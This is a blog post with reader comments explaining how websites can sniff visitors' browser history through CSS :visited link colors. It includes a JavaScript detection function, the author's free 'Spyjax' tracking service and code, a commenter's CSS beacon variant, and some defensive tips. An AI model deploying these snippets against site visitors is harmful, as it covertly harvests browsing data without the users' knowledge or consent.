If you’re like most web users, you assume that your browser history is private. For example if you visit an online store, you assume they can’t see if you’ve been looking at their competitor. Just a few weeks ago I assumed this was the case. Guess what?
Your browser history is not private!
In fact with a few well crafted lines of Javascript, websites can examine your browser history and record what pages you have been to. Keep reading and I’ll tell you exactly how it’s done and introduce you to a service that any webmaster can put on their site to see what pages their users have visited. I’ll also tell you exactly what type of information can be retrieved, and how you can protect yourself.
How JavaScript Can Be Used To Steal Your Browser History:
With CSS website designers can make links a different color if they have been visited by the user. For example this link should be colored differently than this other link. The first link you have been to before (it’s the page you are on right now) while the second link you have never visited (because it is fictitious). Now you’re thinking “but how can this be used to steal my history?”. Let’s dive a little deeper.
Javascript Can Examine The Color Of Your Links = Steal Your Browsing History
Javascript can examine the rendered state of an HTML document, called the DOM. One of the properties that is available through the DOM is the current CSS attributes of a node (nodes are HTML tags, one of which is the <a> or link tag).
All a website has to do to see what pages you’ve been to is place a list of links on the page and examine the color of those links. Ajax can be used to retrieve a list of links to test and also send the results back to the server without the user ever knowing.
The code to do this examination can be a little tricky due to cross browser issues. Here is a snippet of Javascript that can do the evaluation (based on the Hey you! Where have you been? blog post by Peter van der Graaf and script from Jeremiah Grossman and Robert Cabri):
<pre>
function hasLinkBeenVisited(url) {
var link = document.createElement('a');
link.href = url;
document.body.appendChild(link);
if (link.currentStyle) {
var color = link.currentStyle.color;
if (color == '#ff0000')
return true;
return false;
} else {
link.setAttribute("href",url);
var computed_style = document.defaultView.getComputedStyle( link, null );
if (computed_style) {
if (computed_style.color == 'rgb(255, 0, 0)')
return true;
}
return false;
}
}
</pre>
The code above assumes that CSS rules are making links that have been visited red (#ff0000) and new links a different color.
Ajax Can Be Used To Examine Thousands Of Links Dynamically
A clever web developer can use Ajax to dynamically load a list of links for each new visitor. A couple hundred links can be grabbed at a time and examined without slowing down the page noticeably. If you spend just a few seconds on a website thousands of URLs can be checked.
The Limitations
This technique does not allow sites to read your entire browser history. It only allows a site to test a predefined list of URLs to see if you have visited any of them. It’s like the card game “go fish”, you can’t see the players cards but you can ask them if they have any particular card. Most likely the way this technology would be used is to examine a list of competing URLs. This could give a website valuable information on who their competitors really are and what information on those sites is being looked at.
How To Stop People From Spying On Your Browser History
There are two sure fire ways to stop people from stealing your browser history.
- The nuclear option is to disable JavaScript within your browser. In Firefox you’d just go to Tools -> Options -> Content tab and then uncheck “Enable JavaScript”. This method is very limiting because you probably enjoy all the JavaScript goodness on the web.
- Limit your browser history. The less browser history you store the fewer URLs someone can steal from that history. In Firefox you can change the amount of browser history by going to Tools -> Options -> Privacy and then either uncheck the “Remember visited pages” checkbox or change the number of days that history is stored for.
UPDATE: Spyjax Has Been Turned Off
I will no longer be hosting Spyjax. It’s been fun and very interesting, but it’s time to call it quits. Read more here.
Introducing Spyjax
One Line Of JavaScript And You Can Start Spying
Ok, now that I’ve explained how this all works and how you can protect yourself, I want to introduce you to a small piece of code that I wrote that makes it super easy for you to spy on your website visitors. It’s called Spyjax and here’s how it works.
-
Sign Up For An Account
All that’s required is your email address and a password of your choosing. I promise I will not send you any unwanted email or give your email address away to anyone else. Sign Up For Spyjax
-
Add URLs To Look For
You can add custom URLs, the top 12 Google results for any search, or just look for the home page of the top 10,000 sites on the web.
-
Put One Line Of Code At The Bottom Of Your Pages
A simple <script> tag will insert all the JavaScript needed to spy on your visitors as well as communicate with the Spyjax service to record the results.
-
Optionally Add A Spyjax Widget To Your Site
If you just want to have some fun and show people that you’re spying on them you can put one of three Spyjax widgets on your website. There’s one on this site on the right sidebar.
Update: Spyjax Only Gives You Anonymous Data
There have been some concerns raised since I first published this article and released Spyjax. So I just wanted to point out that the service does not link specific websites with identifiable user data. It simply tells you things like 36% of your visitors have been to http://www.google.com/. Basically all the data collected by Spyjax is anonymous and shown in aggregate form. Obviously this same technology could be used to track specific user’s history, especially if you’re on a site that records your identity in some way. In my humble opinion it’s much better to debate these issues in the open than to have this sort of technology floating around without people knowing about it.
So You Just Want The Code?
Well I’m not greedy, so I’m giving it away for free. You can do anything you want with it, just don’t blame me if it breaks or gets you in trouble.
You can download the code here: Spyjax Code. It’s got an open source Attribution Assurance License attached to it.
Check out these services by my company MerchantOS:
- POS Software – A point of sale and inventory control system for small retailers.
- Bike Shop Point of Sale – A full POS solution specifically designed for independent bicycle retailers.
{ 46 trackbacks }
{ 26 comments }
← Previous Comments
That was very clever !
OKAY, so if you already know who your “competitors” are, or if you already have a wishlist of links to compare against, I guess all is fine and dandy, right?
If you’re just starting out, perhaps, a good idea to amass some links to compare against with Spyjax would be to grab the referring page (document.referrer) and log that information for a week (or a month, depends on the amount of traffic you get).
Typically, that’s a fairly decent way to gauge what kind of visitor is interested in your web site (although I would be the first to admit that it’s not scientific or necessarily foolproof).
For what it’s worth, and please keep up the good work!
WebGyver
How about a non-javascript version?
a[href*="yahoo.com"]:visited {background:url(/spyjax.cgi?url=yahoo.com)}
a[href*="google.com"]:visited {background:url(/spyjax.cgi?url=google.com)}
Bob Saget, you are missing the point. CSS would only show visited links to the user. They already know what they visited (they are the ones that did it!), so this is pointless. With javascript, you can send this information back to the server, so that the website owner can know where the users have been visiting.
@#8 – no, you’re the one missing the point.
(1) Old.
(2) It *doesn’t* expose your browser history. What you describe, does not do that. You *can’t* write code to tell me what pages I visited before I came to your page.
#7 makes a good point. You could use css to send back a hit to a server side script with the url in the querystring. I wonder how fast it would be?
not working with people checking on IE
#7’s code doesn’t give you the precise URL, just lets you know that certain domains have been visited.
It is a partial solution.
Also, I’d like to note that the Firefox extension SafeHistory is specifically designed to prevent this exploit, by subjecting “visited”-marking to the browser’s cookie policy.
Great job! I will definately try this myself on my site.
Also it doesn’t seem to work on Safari on the Mac (which is a good thing cause that is the browser I use most) LOL
Wow, I wasn’t aware that you can get this data. I’ll definitely be experimenting with it, and can only imagine the possibilities of using it with Ajax and some ecommerce sites…
If you are using Firefox, this extension seems to solve the problem:
http://safehistory.com/
I’ve created the same tool 3 months ago
but i have wrote my article in italian ( http://www.kerouac3001.com/black-hat-tool-per-interrogare-la-cache-di-un-utente-56.htm )..here’s the english post of another italian blogger that talk about this: http://antirez.com/page/cachetest
Wow, interesting. There is so much data out there I think my browser history is the least of my problems.
Hi
It’s very useful for us to use in blog templates.
Thank you
Blimey govenor! Didn’t know this was possible, nice one!
Here’s the list of URLs it checks against:
http://www.merchantos.com/makebeta/spyjax/urls.php?hash=b8db3693460aff2ab374b7ec3009f12b&getoldurls=0&hit_id=20383&noCacheIE=1180980736967
@Bob Saget:
That is a very good idea! I just wrote my own “version of spyjax”, mine uses a rather simple (and slow) brute force method and I will see how I can implement your idea.
Many thanks for this, very interesting. In terms of defending oneself against this sort of thing, the type and level of control and protection seems to be browser dependent – for instance in Opera deleting a visited page history won’t delete the same page’s visited link history, but you can manually clear just the visited links history.
I’ve experimented and produced a table comparing Opera, Internet Explorer and Firefox – at http://www.consumingexperience.com/2007/06/spyjax-websites-can-see-your-visited.html.
never knew that this stuff exist
And a lot of you guys are who will eventually make the ‘net so scary that nobody in their right mind will venture there. Reminds me of “Minority Report”.
I will be trying this out. I am putting together a big online PR campaign and so im going to target competitor search terms. (using seodigger)
with this tool, I will obviously see where users have come from, which means I will tip off the display advertising team, so they can maybe place ads on these sites
I will also do seodigger on these sites and see where they rank, and from that i can also look at the best google territory to target.
and of course when a user actally converts into a sale, i will understand their pathways to my site. form that i can see what works best….very valuable
Thats right but disabling the javascript is not a good solution, i think.
In this world nothing is private
thanks for this message for demostration this.
Who knows, maybe this sight is viewing your browsing history???
Firefox users might try tools -> options, Content section, Colors.. button under Font and Colors group, and unchecking Allow pages to choose their own color…, as well as setting link colors to something non standard. Think this could stop the spyjax (too lazy atm to try myself)? Not sure if there is anything you can do about that CSS thing Bob Saget showed. Other than disable CSS which is just out of the question.
Comments on this entry are closed.